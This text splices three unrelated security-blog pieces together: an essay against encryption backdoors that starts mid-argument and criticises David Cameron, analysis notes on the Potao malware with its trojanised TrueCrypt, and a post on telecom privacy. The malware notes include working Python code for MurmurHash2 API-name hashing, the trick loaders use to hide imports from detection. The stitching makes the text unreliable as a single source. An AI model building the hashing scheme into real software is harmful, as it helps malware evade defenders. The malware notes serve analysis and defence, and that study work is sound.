Separating the interesting targets from the mass is the real goal in this effort. Strong crypto is in itself not the intelligence agencies’ main threat. It’s the trend that makes strong crypto a default in widely used communication apps. This makes it harder to identify the suspects in the first place as they can use the same tools and look no different from ordinary citizens.
Backdoors in the commonly used communication apps would however drive the primary targets towards more secure, or even customized, solutions. These solutions would of course not disappear. But the use of them would not be mainstream, and function as a signal that someone has a need for stronger security. This signal is the main benefit of a mandatory backdoor program.
But it is still not worth it; the price is far too high. Real-world metaphors are often a good way to describe IT issues. Imagine a society where the norm is to leave your home door unlocked. The police walk around checking all the doors. They may peek inside to check what you are up to. And those with a locked door must have something to hide and are automatically suspects. Does this feel right? Would you like to live in a society like that? This is the IT society some agencies and politicians want.
(* Yes, demanding backdoors and banning cryptography is not the same thing. But a backdoor is always a deliberate fault that makes an encryption system weaker. So it’s fair to say that demanding backdoors is equal to banning correctly implemented encryption.
It’s a well-known fact that the UK’s Prime Minister David Cameron doesn’t care much about people’s privacy. Recently he has been driving the so-called Snooper’s Charter, which would give authorities expanded surveillance powers and got additional fuel from the Paris attacks.
It is said that terrorists want to tear down Western society and its lifestyle. And Cameron definitely puts himself in the same camp with statements like this:
“In our country, do we want to allow a means of communication between people which we cannot read? No, we must not.”
Note that he didn’t say terrorists, he said people. Kudos for the honesty. It’s a fact that terrorists blend in with the rest of the population, and any attempt to weaken their security affects all of us. And it should be a no-brainer that a nation where the government can listen in on everybody is bad, at least if you have read Orwell’s Nineteen Eighty-Four.
But why does WhatsApp come up over and over as an example of something that gives the snoops grey hair? It’s a mainstream instant messenger app that wasn’t built for security. There are also similar apps that focus on security and privacy, like Telegram, Signal and Wickr. Why isn’t Cameron raging about them?
The answer is both simple and very significant, but it may not be obvious at first. The Internet was insecure by default and you had to use tools to fix that. The pre-Snowden era was the golden age for agencies tapping into the Internet backbone. Everything was open and unencrypted, except the really interesting stuff. Encryption itself became a signal that someone was of interest, and the authorities could use other means to find out what that person was up to.
More and more encryption is being built in by default now that we, thanks to Snowden, know the real state of things. A secured connection between client and server is becoming the norm for communication services. And many services are deploying end-to-end encryption, which means that messages are secured and opened by the communicating devices, not by the servers. Data stored on the servers is thus also safe from snoops. So yes, people with Cameron’s mindset have a real problem here. Correctly implemented end-to-end encryption can be next to impossible to break.
But there’s still one important thing that tapping the wire can reveal: which communication tool you are using, and this is the important point. WhatsApp is a mainstream messenger with security. Telegram, Signal and Wickr are security messengers used by only a small group of people with special needs. Traffic from both WhatsApp and Signal, for example, is encrypted. But the fact that you are using Signal is the important point. You stick out, just like encryption users before.
WhatsApp is the prime target of Cameron’s wrath mainly because it is showing us how security will be implemented in the future. We are quickly moving towards a net where security is built in. Everyone will get decent security by default and minding your security will not make you a suspect anymore. And that’s great! We all need protection in a world with escalating cyber criminality.
WhatsApp is by no means a perfect security solution. The implementation of end-to-end encryption started in late 2014 and is still far from complete. The handling of metadata about users and communication is not very secure, and there are tricks the wire-snoops can use to map people’s networks of contacts. So check it out thoroughly before you start using it for really hot stuff. But WhatsApp seems to be on the path to becoming something unique: among the first communication solutions that are easy to use, popular and secure by default.
Apple’s iMessage is another example. It is so easy that many are using it without knowing it, when they think they are sending SMS messages. But iMessage’s security is unfortunately not flawless either.
PS. Yes, weakening security IS a bad idea. An excellent example is the TSA luggage locks, which have a master key that *used to be* secret.
Image by Sam Azgor
- Aka Sapotao and node69
- Group - Sandworm / Quedagh APT
- Vectors - USB, exe as doc, xls
- Victims - RU, BY, AM, GE
- Victims - MMM group, UA gov
- truecryptrussia.ru has been serving modified versions of the encryption software (Win32/FakeTC) that included a backdoor to selected targets.
- Win32/FakeTC - data theft from encrypted drives
- The Potao main DLL only takes care of its core functionality; the actual spying functions are implemented in the form of downloadable modules. The plugins are downloaded each time the malware starts, since they aren’t stored on the hard drive.
- 1st Full Plugin and its export function is called Plug. Full plugins run continuously until the infected system is restarted
- 2nd Light Plugin with an export function Scan. Light plugins terminate immediately after returning a buffer with the information they harvested off the victim’s machine.
- Some of the plugins were signed with a certificate issued to “Grandtorg”:
- Strong encryption. The data sent is encapsulated using the XML-RPC protocol.
- MethodName value 10a7d030-1a61-11e3-beea-001c42e2a08b is always present in Potao traffic.
- After receiving the request, the C&C server generates an RSA-2048 public key and signs this generated key with another, static RSA-2048 private key.
- In 2nd stage the malware generates a symmetric AES-256 key. This AES session key is encrypted with the newly received RSA-2048 public key and sent to the C&C server.
- The actual data exchange after the key exchange is then encrypted using symmetric cryptography, which is faster, with the AES-256 key.
- The Potao malware sends an encrypted request to the server with computer ID, campaign ID, OS version, version of malware, computer name, current privileges, OS architecture (64 or 32bits) and also the name of the current process.
- Potao USB - uses social engineering, exe in the root disguised as drive icon
- Potao Anti RE - uses the MurmurHash2 algorithm for computing the hashes of the API function names.
- Potao Anti RE - encryption of strings
- Russian TrueCrypt Win32/FakeTC - The malicious program code within the otherwise functional TrueCrypt software runs in its own thread. This thread, created at the end of the Mount function, enumerates files on the mounted encrypted drive, and if certain conditions are met, it connects to the C&C server, ready to execute commands from the attackers.
- IOC https://github.com/eset/malware-ioc/tree/master/potao
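The API-name hashing noted in the anti-RE bullets above is a common loader technique: the malware stores only 32-bit hashes of the API names it needs (so the strings never appear in the binary) and resolves each one at runtime by hashing candidate export names until one matches. Below is a pure-Python sketch of the standard 32-bit MurmurHash2 plus a toy resolver; the export list and function names are illustrative, not taken from Potao itself:

```python
def murmurhash2(data: bytes, seed: int = 0) -> int:
    """Standard 32-bit MurmurHash2 (Austin Appleby's reference algorithm)."""
    m, r, mask = 0x5BD1E995, 24, 0xFFFFFFFF
    h = (seed ^ len(data)) & mask
    i = 0
    while len(data) - i >= 4:               # process 4-byte chunks
        k = int.from_bytes(data[i:i + 4], "little")
        k = (k * m) & mask
        k ^= k >> r
        k = (k * m) & mask
        h = (h * m) & mask
        h ^= k
        i += 4
    tail = data[i:]                          # handle remaining 0-3 bytes
    if len(tail) >= 3:
        h ^= tail[2] << 16
    if len(tail) >= 2:
        h ^= tail[1] << 8
    if len(tail) >= 1:
        h ^= tail[0]
        h = (h * m) & mask
    h ^= h >> 13                             # final avalanche
    h = (h * m) & mask
    h ^= h >> 15
    return h

def resolve_by_hash(target: int, exports: list) -> str:
    """Mimic a loader walking an export table: hash each exported name
    and return the one matching the stored hash (None if no match)."""
    for name in exports:
        if murmurhash2(name.encode()) == target:
            return name
    return None
```

A loader using this scheme ships only the integer hash, then calls something like `resolve_by_hash(stored_hash, export_names)` against the loaded DLL’s export table, which is what makes static string-based detection harder.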
With Net Neutrality close to becoming a reality in the United States, Europe’s telecom companies appear ready to fight for consumers’ trust.
At the Mobile World Congress in Barcelona this week, Telefonica CEO Cesar Alierta called for strict rules that will foster “digital confidence”. Vodafone CEO Vittorio Colao’s keynote highlighted the need for both privacy and security. Deutsche Telekom’s Tim Höttges was in agreement, noting that “data privacy is super-critical”.
“80% [of consumers] are concerned about data security and privacy, but they are always clicking ‘I accept [the terms and conditions], I accept, I accept’ without reading them,” said Höttges, echoing a reality we found when conducting an experiment that — in the fine print — asked people to give up their first born child in exchange for free Wi-Fi.
The fight for consumers’ digital freedom is close to our hearts at F-Secure, and we agree that strong rules about data breach disclosure are essential to regaining consumers’ trust. However, anything that limits freedom in the name of privacy must be avoided.
Telenor CEO and GSMA chairman Fredrik Baksaas noted the very real problem that consumers face managing multiple online identities with multiple passwords. He suggested tying digital identity to SIM cards. This dream of a single identity may seem liberating on a practical level. But beyond recently exposed problems with SIM security, a chained identity could disrupt some of the key benefits of online life — the right to define your identity, the liberty to separate work life from home life, the ability to participate in communities with an alternate persona.
GSMA is behind a single authentication system, adopted by more than a dozen operators, that is tied to phones and could simplify life for many users. But it will likely not quench the desire for multiple email accounts or identities on a site, nor completely solve the conundrum of digital identity.
The biggest problem is that so many of us aren’t aware of what we’ve already given up.
The old saying goes, “If it’s free, you’re the product”. This was a comfortable model for generations who grew up trading free content in exchange for watching or listening to advertisements. But now the ads are watching us back.
F-Secure Labs has found that more than half of the most popular URLs in the world aren’t accessed directly by users. They’re accessed automatically when we visit the sites we intend to visit, and they are used to track our activity.
Conventional terms and conditions are legal formalities that offer no benefits to users. As our Mikko Hypponen often says, the biggest lie on the Internet is “I have read and agreed with terms and conditions.” This will have to change for any hope of a world where privacy is respected.
In the developed world, store-bought food is mandated to have its nutritional information printed on the packaging. We don’t typically read — nor understand — all the ingredients. But we get a snapshot of what effect it will have on us physically.
How about something like this for privacy: a label that informs us how our data is treated by a particular site or application?
What data is captured?
Is it just on this site, or does it follow you around the web?
How long is it stored?
Whom is it shared with?
Key questions, simply answered — all with the purpose of making it clear that your privacy has value.
Along with this increased transparency, operators and everyone who cares about digital rights must pay close attention to the effort to ban or limit encryption in the name of public safety. The right of law-abiding citizens to cloak their online activity is central to democracy. And all the privacy innovations in the world won’t matter if we cannot expect that right to exist.
We are entering an era where consumers will have more reasons, need and opportunities to connect than ever before. The services that offer us the chance to be more than a product will be the ones that thrive.